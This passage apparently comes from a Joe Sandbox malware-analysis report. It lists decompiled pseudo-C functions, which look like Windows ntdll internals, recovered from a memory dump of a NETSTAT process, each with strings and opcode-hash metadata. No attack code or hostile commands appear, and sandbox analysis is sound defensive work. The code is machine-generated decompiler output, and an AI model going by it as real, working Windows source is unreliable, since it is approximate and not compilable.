                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _t30;
                                      			}









                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: WindowsExcludedProcs
                                      • API String ID: 0-3583428290
                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                      • Instruction ID: 0b8805b79ca0880cfa8affe8a9aae1301c9ae9b8135fa7394b37e4f77b7207ad
                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                      • Instruction Fuzzy Hash: 7321D636581328ABCB259AD58940FDBB7ADAB80668F15D469BD089F200D730D901EBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E8F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                      				intOrPtr _t13;
                                      				intOrPtr _t14;
                                      				signed int _t16;
                                      				signed char _t17;
                                      				intOrPtr _t19;
                                      				intOrPtr _t21;
                                      				intOrPtr _t23;
                                      				intOrPtr* _t25;
                                      
                                      				_t25 = _a8;
                                      				_t17 = __ecx;
                                      				if(_t25 == 0) {
                                      					_t19 = 0xc00000f2;
                                      					L8:
                                      					return _t19;
                                      				}
                                      				if((__ecx & 0xfffffffe) != 0) {
                                      					_t19 = 0xc00000ef;
                                      					goto L8;
                                      				}
                                      				_t19 = 0;
                                      				 *_t25 = 0;
                                      				_t21 = 0;
                                      				_t23 = "Actx ";
                                      				if(__edx != 0) {
                                      					if(__edx == 0xfffffffc) {
                                      						L21:
                                      						_t21 = 0x200;
                                      						L5:
                                      						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                      						 *_t25 = _t13;
                                      						L6:
                                      						if(_t13 == 0) {
                                      							if((_t17 & 0x00000001) != 0) {
                                      								 *_t25 = _t23;
                                      							}
                                      						}
                                      						L7:
                                      						goto L8;
                                      					}
                                      					if(__edx == 0xfffffffd) {
                                      						 *_t25 = _t23;
                                      						_t13 = _t23;
                                      						goto L6;
                                      					}
                                      					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                      					 *_t25 = _t13;
                                      					L14:
                                      					if(_t21 == 0) {
                                      						goto L6;
                                      					}
                                      					goto L5;
                                      				}
                                      				_t14 = _a4;
                                      				if(_t14 != 0) {
                                      					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                      					if(_t16 <= 1) {
                                      						_t21 = 0x1f8;
                                      						_t13 = 0;
                                      						goto L14;
                                      					}
                                      					if(_t16 == 2) {
                                      						goto L21;
                                      					}
                                      					if(_t16 != 4) {
                                      						_t19 = 0xc00000f0;
                                      						goto L7;
                                      					}
                                      					_t13 = 0;
                                      					goto L6;
                                      				} else {
                                      					_t21 = 0x1f8;
                                      					goto L5;
                                      				}
                                      			}












                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Actx
                                      • API String ID: 0-89312691
                                      • Opcode ID: ae4621f5fbdeed2d204b5cd36fde2ef66b046146ea6062ed0158c2cda4b1805b
                                      • Instruction ID: dcf2439fca7433b51ae7effdd07c2aa2a76d16a3072e62d8e949225b3764393f
                                      • Opcode Fuzzy Hash: ae4621f5fbdeed2d204b5cd36fde2ef66b046146ea6062ed0158c2cda4b1805b
                                      • Instruction Fuzzy Hash: 4B11E6347E46028BF7246E1DC4907767295AB9522CFA4E52AE4EDCBB90DB76C801C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 71%
                                      			E02F18DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                      				intOrPtr _t35;
                                      				void* _t41;
                                      
                                      				_t40 = __esi;
                                      				_t39 = __edi;
                                      				_t38 = __edx;
                                      				_t35 = __ecx;
                                      				_t34 = __ebx;
                                      				_push(0x74);
                                      				_push(0x2f40d50);
                                      				E02EBD0E8(__ebx, __edi, __esi);
                                      				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                      				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                      				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                      					E02EF5720(0x65, 0, "Critical error detected %lx\n", _t35);
                                      					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                      						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                      						asm("int3");
                                      						 *(_t41 - 4) = 0xfffffffe;
                                      					}
                                      				}
                                      				 *(_t41 - 4) = 1;
                                      				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                      				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                      				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                      				 *((intOrPtr*)(_t41 - 0x64)) = L02EBDEF0;
                                      				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                      				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                      				_push(_t41 - 0x70);
                                      				L02EBDEF0(1, _t38);
                                      				 *(_t41 - 4) = 0xfffffffe;
                                      				return E02EBD130(_t34, _t39, _t40);
                                      			}






                                      Strings
                                      • Critical error detected %lx, xrefs: 02F18E21
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Critical error detected %lx
                                      • API String ID: 0-802127002
                                      • Opcode ID: a7830fe668b9ce3b28c381af62b486e7dfaa38692c5a3b9486275ca45791ea99
                                      • Instruction ID: 79cbd1f99ea491d7660c49b98d46f55d04d9344dc7430ac23cda63efd0a9b771
                                      • Opcode Fuzzy Hash: a7830fe668b9ce3b28c381af62b486e7dfaa38692c5a3b9486275ca45791ea99
                                      • Instruction Fuzzy Hash: 0211AD75D54348DBEF25CFA48A057DDBBB1BF04394F20926DE669AB282C7704602CF14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 02EFFF60
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                      • API String ID: 0-1911121157
                                      • Opcode ID: 682055e7acc7c92b0a3406ea6d7ce0e3fd4c35fbd23337e090c682bb07eaf748
                                      • Instruction ID: eb86ac02a89d11490f44773f7e95030c06cd925409f0e58048a937cbb855df5c
                                      • Opcode Fuzzy Hash: 682055e7acc7c92b0a3406ea6d7ce0e3fd4c35fbd23337e090c682bb07eaf748
                                      • Instruction Fuzzy Hash: 7711ED72990248EFEB62EB50CD48F98BBB2FF08718F15D454F7086B6A0C7799950CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 88%
                                      			E02F35BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                      				signed int _t296;
                                      				signed char _t298;
                                      				signed int _t301;
                                      				signed int _t306;
                                      				signed int _t310;
                                      				signed char _t311;
                                      				intOrPtr _t312;
                                      				signed int _t313;
                                      				void* _t327;
                                      				signed int _t328;
                                      				intOrPtr _t329;
                                      				intOrPtr _t333;
                                      				signed char _t334;
                                      				signed int _t336;
                                      				void* _t339;
                                      				signed int _t340;
                                      				signed int _t356;
                                      				signed int _t362;
                                      				short _t367;
                                      				short _t368;
                                      				short _t373;
                                      				signed int _t380;
                                      				void* _t382;
                                      				short _t385;
                                      				signed short _t392;
                                      				signed char _t393;
                                      				signed int _t395;
                                      				signed char _t397;
                                      				signed int _t398;
                                      				signed short _t402;
                                      				void* _t406;
                                      				signed int _t412;
                                      				signed char _t414;
                                      				signed short _t416;
                                      				signed int _t421;
                                      				signed char _t427;
                                      				intOrPtr _t434;
                                      				signed char _t435;
                                      				signed int _t436;
                                      				signed int _t442;
                                      				signed int _t446;
                                      				signed int _t447;
                                      				signed int _t451;
                                      				signed int _t453;
                                      				signed int _t454;
                                      				signed int _t455;
                                      				intOrPtr _t456;
                                      				intOrPtr* _t457;
                                      				short _t458;
                                      				signed short _t462;
                                      				signed int _t469;
                                      				intOrPtr* _t474;
                                      				signed int _t475;
                                      				signed int _t479;
                                      				signed int _t480;
                                      				signed int _t481;
                                      				short _t485;
                                      				signed int _t491;
                                      				signed int* _t494;
                                      				signed int _t498;
                                      				signed int _t505;
                                      				intOrPtr _t506;
                                      				signed short _t508;
                                      				signed int _t511;
                                      				void* _t517;
                                      				signed int _t519;
                                      				signed int _t522;
                                      				void* _t523;
                                      				signed int _t524;
                                      				void* _t528;
                                      				signed int _t529;
                                      
                                      				_push(0xd4);
                                      				_push(0x2f41178);
                                      				E02EBD0E8(__ebx, __edi, __esi);
                                      				_t494 = __edx;
                                      				 *(_t528 - 0xcc) = __edx;
                                      				_t511 = __ecx;
                                      				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                      				 *(_t528 - 0xbc) = __ecx;
                                      				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                      				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                      				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                      				_t427 = 0;
                                      				 *(_t528 - 0x74) = 0;
                                      				 *(_t528 - 0x9c) = 0;
                                      				 *(_t528 - 0x84) = 0;
                                      				 *(_t528 - 0xac) = 0;
                                      				 *(_t528 - 0x88) = 0;
                                      				 *(_t528 - 0xa8) = 0;
                                      				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                      				if( *(_t528 + 0x1c) <= 0x80) {
                                      					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                      					if(__eflags != 0) {
                                      						_t421 = E02F34C56(0, __edx, __ecx, __eflags);
                                      						__eflags = _t421;
                                      						if(_t421 != 0) {
                                      							 *((intOrPtr*)(_t528 - 4)) = 0;
                                      							E02EAD000(0x410);
                                      							 *(_t528 - 0x18) = _t529;
                                      							 *(_t528 - 0x9c) = _t529;
                                      							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                      							E02F35542(_t528 - 0x9c, _t528 - 0x84);
                                      						}
                                      					}
                                      					_t435 = _t427;
                                      					 *(_t528 - 0xd0) = _t435;
                                      					_t474 = _t511 + 0x65;
                                      					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                      					_t511 = 0x18;
                                      					while(1) {
                                      						 *(_t528 - 0xa0) = _t427;
                                      						 *(_t528 - 0xbc) = _t427;
                                      						 *(_t528 - 0x80) = _t427;
                                      						 *(_t528 - 0x78) = 0x50;
                                      						 *(_t528 - 0x79) = _t427;
                                      						 *(_t528 - 0x7a) = _t427;
                                      						 *(_t528 - 0x8c) = _t427;
                                      						 *(_t528 - 0x98) = _t427;
                                      						 *(_t528 - 0x90) = _t427;
                                      						 *(_t528 - 0xb0) = _t427;
                                      						 *(_t528 - 0xb8) = _t427;
                                      						_t296 = 1 << _t435;
                                      						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                      						__eflags = _t436 & _t296;
                                      						if((_t436 & _t296) != 0) {
                                      							goto L92;
                                      						}
                                      						__eflags =  *((char*)(_t474 - 1));
                                      						if( *((char*)(_t474 - 1)) == 0) {
                                      							goto L92;
                                      						}
                                      						_t301 =  *_t474;
                                      						__eflags = _t494[1] - _t301;
                                      						if(_t494[1] <= _t301) {
                                      							L10:
                                      							__eflags =  *(_t474 - 5) & 0x00000040;
                                      							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                      								L12:
                                      								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                      								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                      									goto L92;
                                      								}
                                      								_t442 =  *(_t474 - 0x11) & _t494[3];
                                      								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                      								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                      									goto L92;
                                      								}
                                      								__eflags = _t442 -  *(_t474 - 0x11);
                                      								if(_t442 !=  *(_t474 - 0x11)) {
                                      									goto L92;
                                      								}
                                      								L15:
                                      								_t306 =  *(_t474 + 1) & 0x000000ff;
                                      								 *(_t528 - 0xc0) = _t306;
                                      								 *(_t528 - 0xa4) = _t306;
                                      								__eflags =  *0x2f560e8;
                                      								if( *0x2f560e8 != 0) {
                                      									__eflags = _t306 - 0x40;
                                      									if(_t306 < 0x40) {
                                      										L20:
                                      										asm("lock inc dword [eax]");
                                      										_t310 =  *0x2f560e8; // 0x0
                                      										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                      										__eflags = _t311 & 0x00000001;
                                      										if((_t311 & 0x00000001) == 0) {
                                      											 *(_t528 - 0xa0) = _t311;
                                      											_t475 = _t427;
                                      											 *(_t528 - 0x74) = _t427;
                                      											__eflags = _t475;
                                      											if(_t475 != 0) {
                                      												L91:
                                      												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                      												goto L92;
                                      											}
                                      											asm("sbb edi, edi");
                                      											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                      											_t511 = _t498;
                                      											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                      											__eflags =  *(_t312 - 5) & 1;
                                      											if(( *(_t312 - 5) & 1) != 0) {
                                      												_push(_t528 - 0x98);
                                      												_push(0x4c);
                                      												_push(_t528 - 0x70);
                                      												_push(1);
                                      												_push(0xfffffffa);
                                      												_t412 = E02EA9710();
                                      												_t475 = _t427;
                                      												__eflags = _t412;
                                      												if(_t412 >= 0) {
                                      													_t414 =  *(_t528 - 0x98) - 8;
                                      													 *(_t528 - 0x98) = _t414;
                                      													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                      													 *(_t528 - 0x8c) = _t416;
                                      													 *(_t528 - 0x79) = 1;
                                      													_t511 = (_t416 & 0x0000ffff) + _t498;
                                      													__eflags = _t511;
                                      												}
                                      											}
                                      											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                      											__eflags = _t446 & 0x00000004;
                                      											if((_t446 & 0x00000004) != 0) {
                                      												__eflags =  *(_t528 - 0x9c);
                                      												if( *(_t528 - 0x9c) != 0) {
                                      													 *(_t528 - 0x7a) = 1;
                                      													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                      													__eflags = _t511;
                                      												}
                                      											}
                                      											_t313 = 2;
                                      											_t447 = _t446 & _t313;
                                      											__eflags = _t447;
                                      											 *(_t528 - 0xd4) = _t447;
                                      											if(_t447 != 0) {
                                      												_t406 = 0x10;
                                      												_t511 = _t511 + _t406;
                                      												__eflags = _t511;
                                      											}
                                      											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                      											 *(_t528 - 0x88) = _t427;
                                      											__eflags =  *(_t528 + 0x1c);
                                      											if( *(_t528 + 0x1c) <= 0) {
                                      												L45:
                                      												__eflags =  *(_t528 - 0xb0);
                                      												if( *(_t528 - 0xb0) != 0) {
                                      													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                      													__eflags = _t511;
                                      												}
                                      												__eflags = _t475;
                                      												if(_t475 != 0) {
                                      													asm("lock dec dword [ecx+edx*8+0x4]");
                                      													goto L100;
                                      												} else {
                                      													_t494[3] = _t511;
                                      													_t451 =  *(_t528 - 0xa0);
                                      													_t427 = E02EA6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                      													 *(_t528 - 0x88) = _t427;
                                      													__eflags = _t427;
                                      													if(_t427 == 0) {
                                      														__eflags = _t511 - 0xfff8;
                                      														if(_t511 <= 0xfff8) {
                                      															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                      															asm("sbb ecx, ecx");
                                      															__eflags = (_t451 & 0x000000e2) + 8;
                                      														}
                                      														asm("lock dec dword [eax+edx*8+0x4]");
                                      														L100:
                                      														goto L101;
                                      													}
                                      													_t453 =  *(_t528 - 0xa0);
                                      													 *_t494 = _t453;
                                      													_t494[1] = _t427;
                                      													_t494[2] =  *(_t528 - 0xbc);
                                      													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                      													 *_t427 =  *(_t453 + 0x24) | _t511;
                                      													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                      													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                      													asm("movsd");
                                      													asm("movsd");
                                      													asm("movsd");
                                      													asm("movsd");
                                      													asm("movsd");
                                      													asm("movsd");
                                      													asm("movsd");
                                      													asm("movsd");
                                      													__eflags =  *(_t528 + 0x14);
                                      													if( *(_t528 + 0x14) == 0) {
                                      														__eflags =  *[fs:0x18] + 0xf50;
                                      													}
                                      													asm("movsd");
                                      													asm("movsd");
                                      													asm("movsd");
                                      													asm("movsd");
                                      													__eflags =  *(_t528 + 0x18);
                                      													if( *(_t528 + 0x18) == 0) {
                                      														_t454 =  *(_t528 - 0x80);
                                      														_t479 =  *(_t528 - 0x78);
                                      														_t327 = 1;
                                      														__eflags = 1;
                                      													} else {
                                      														_t146 = _t427 + 0x50; // 0x50
                                      														_t454 = _t146;
                                      														 *(_t528 - 0x80) = _t454;
                                      														_t382 = 0x18;
                                      														 *_t454 = _t382;
                                      														 *((short*)(_t454 + 2)) = 1;
                                      														_t385 = 0x10;
                                      														 *((short*)(_t454 + 6)) = _t385;
                                      														 *(_t454 + 4) = 0;
                                      														asm("movsd");
                                      														asm("movsd");
                                      														asm("movsd");
                                      														asm("movsd");
                                      														_t327 = 1;
                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                      														_t479 = 0x68;
                                      														 *(_t528 - 0x78) = _t479;
                                      													}
                                      													__eflags =  *(_t528 - 0x79) - _t327;
                                      													if( *(_t528 - 0x79) == _t327) {
                                      														_t524 = _t479 + _t427;
                                      														_t508 =  *(_t528 - 0x8c);
                                      														 *_t524 = _t508;
                                      														_t373 = 2;
                                      														 *((short*)(_t524 + 2)) = _t373;
                                      														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                      														 *((short*)(_t524 + 4)) = 0;
                                      														_t167 = _t524 + 8; // 0x8
                                      														E02EAF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                      														_t529 = _t529 + 0xc;
                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                      														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                      														 *(_t528 - 0x78) = _t479;
                                      														_t380 =  *(_t528 - 0x80);
                                      														__eflags = _t380;
                                      														if(_t380 != 0) {
                                      															_t173 = _t380 + 4;
                                      															 *_t173 =  *(_t380 + 4) | 1;
                                      															__eflags =  *_t173;
                                      														}
                                      														_t454 = _t524;
                                      														 *(_t528 - 0x80) = _t454;
                                      														_t327 = 1;
                                      														__eflags = 1;
                                      													}
                                      													__eflags =  *(_t528 - 0xd4);
                                      													if( *(_t528 - 0xd4) == 0) {
                                      														_t505 =  *(_t528 - 0x80);
                                      													} else {
                                      														_t505 = _t479 + _t427;
                                      														_t523 = 0x10;
                                      														 *_t505 = _t523;
                                      														_t367 = 3;
                                      														 *((short*)(_t505 + 2)) = _t367;
                                      														_t368 = 4;
                                      														 *((short*)(_t505 + 6)) = _t368;
                                      														 *(_t505 + 4) = 0;
                                      														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                      														_t327 = 1;
                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                      														_t479 = _t479 + _t523;
                                      														 *(_t528 - 0x78) = _t479;
                                      														__eflags = _t454;
                                      														if(_t454 != 0) {
                                      															_t186 = _t454 + 4;
                                      															 *_t186 =  *(_t454 + 4) | 1;
                                      															__eflags =  *_t186;
                                      														}
                                      														 *(_t528 - 0x80) = _t505;
                                      													}
                                      													__eflags =  *(_t528 - 0x7a) - _t327;
                                      													if( *(_t528 - 0x7a) == _t327) {
                                      														 *(_t528 - 0xd4) = _t479 + _t427;
                                      														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                      														E02EAF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                      														_t529 = _t529 + 0xc;
                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                      														_t479 =  *(_t528 - 0x78) + _t522;
                                      														 *(_t528 - 0x78) = _t479;
                                      														__eflags = _t505;
                                      														if(_t505 != 0) {
                                      															_t199 = _t505 + 4;
                                      															 *_t199 =  *(_t505 + 4) | 1;
                                      															__eflags =  *_t199;
                                      														}
                                      														_t505 =  *(_t528 - 0xd4);
                                      														 *(_t528 - 0x80) = _t505;
                                      													}
                                      													__eflags =  *(_t528 - 0xa8);
                                      													if( *(_t528 - 0xa8) != 0) {
                                      														_t356 = _t479 + _t427;
                                      														 *(_t528 - 0xd4) = _t356;
                                      														_t462 =  *(_t528 - 0xac);
                                      														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                      														_t485 = 0xc;
                                      														 *((short*)(_t356 + 2)) = _t485;
                                      														 *(_t356 + 6) = _t462;
                                      														 *((short*)(_t356 + 4)) = 0;
                                      														_t211 = _t356 + 8; // 0x9
                                      														E02EAF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                      														E02EAFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                      														_t529 = _t529 + 0x18;
                                      														_t427 =  *(_t528 - 0x88);
                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                      														_t505 =  *(_t528 - 0xd4);
                                      														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                      														 *(_t528 - 0x78) = _t479;
                                      														_t362 =  *(_t528 - 0x80);
                                      														__eflags = _t362;
                                      														if(_t362 != 0) {
                                      															_t222 = _t362 + 4;
                                      															 *_t222 =  *(_t362 + 4) | 1;
                                      															__eflags =  *_t222;
                                      														}
                                      													}
                                      													__eflags =  *(_t528 - 0xb0);
                                      													if( *(_t528 - 0xb0) != 0) {
                                      														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                      														_t458 = 0xb;
                                      														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                      														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                      														 *((short*)(_t427 + 4 + _t479)) = 0;
                                      														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                      														E02EAFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                      														_t529 = _t529 + 0xc;
                                      														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                      														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                      														 *(_t528 - 0x78) = _t479;
                                      														__eflags = _t505;
                                      														if(_t505 != 0) {
                                      															_t241 = _t505 + 4;
                                      															 *_t241 =  *(_t505 + 4) | 1;
                                      															__eflags =  *_t241;
                                      														}
                                      													}
                                      													_t328 =  *(_t528 + 0x1c);
                                      													__eflags = _t328;
                                      													if(_t328 == 0) {
                                      														L87:
                                      														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                      														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                      														_t455 =  *(_t528 - 0xdc);
                                      														 *(_t427 + 0x14) = _t455;
                                      														_t480 =  *(_t528 - 0xa0);
                                      														_t517 = 3;
                                      														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                      														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                      															asm("rdtsc");
                                      															 *(_t427 + 0x3c) = _t480;
                                      														} else {
                                      															 *(_t427 + 0x3c) = _t455;
                                      														}
                                      														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                      														_t456 =  *[fs:0x18];
                                      														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                      														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                      														_t427 = 0;
                                      														__eflags = 0;
                                      														_t511 = 0x18;
                                      														goto L91;
                                      													} else {
                                      														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                      														__eflags = _t519;
                                      														 *(_t528 - 0x8c) = _t328;
                                      														do {
                                      															_t506 =  *((intOrPtr*)(_t519 - 4));
                                      															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                      															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                      															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                      															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                      															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                      																_t334 =  *_t519;
                                      															} else {
                                      																_t334 = 0;
                                      															}
                                      															_t336 = _t334 & 0x000000ff;
                                      															__eflags = _t336;
                                      															_t427 =  *(_t528 - 0x88);
                                      															if(_t336 == 0) {
                                      																_t481 = _t479 + _t506;
                                      																__eflags = _t481;
                                      																 *(_t528 - 0x78) = _t481;
                                      																E02EAF3E0(_t479 + _t427, _t457, _t506);
                                      																_t529 = _t529 + 0xc;
                                      															} else {
                                      																_t340 = _t336 - 1;
                                      																__eflags = _t340;
                                      																if(_t340 == 0) {
                                      																	E02EAF3E0( *(_t528 - 0xb8), _t457, _t506);
                                      																	_t529 = _t529 + 0xc;
                                      																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                      																} else {
                                      																	__eflags = _t340 == 0;
                                      																	if(_t340 == 0) {
                                      																		__eflags = _t506 - 8;
                                      																		if(_t506 == 8) {
                                      																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                      																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                      																		}
                                      																	}
                                      																}
                                      															}
                                      															_t339 = 0x10;
                                      															_t519 = _t519 + _t339;
                                      															_t263 = _t528 - 0x8c;
                                      															 *_t263 =  *(_t528 - 0x8c) - 1;
                                      															__eflags =  *_t263;
                                      															_t479 =  *(_t528 - 0x78);
                                      														} while ( *_t263 != 0);
                                      														goto L87;
                                      													}
                                      												}
                                      											} else {
                                      												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                      												 *(_t528 - 0xa2) = _t392;
                                      												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                      												__eflags = _t469;
                                      												while(1) {
                                      													 *(_t528 - 0xe4) = _t511;
                                      													__eflags = _t392;
                                      													_t393 = _t427;
                                      													if(_t392 != 0) {
                                      														_t393 =  *((intOrPtr*)(_t469 + 4));
                                      													}
                                      													_t395 = (_t393 & 0x000000ff) - _t427;
                                      													__eflags = _t395;
                                      													if(_t395 == 0) {
                                      														_t511 = _t511 +  *_t469;
                                      														__eflags = _t511;
                                      													} else {
                                      														_t398 = _t395 - 1;
                                      														__eflags = _t398;
                                      														if(_t398 == 0) {
                                      															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                      															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                      														} else {
                                      															__eflags = _t398 == 1;
                                      															if(_t398 == 1) {
                                      																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                      																_t402 =  *_t469 & 0x0000ffff;
                                      																 *(_t528 - 0xac) = _t402;
                                      																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                      															}
                                      														}
                                      													}
                                      													__eflags = _t511 -  *(_t528 - 0xe4);
                                      													if(_t511 <  *(_t528 - 0xe4)) {
                                      														break;
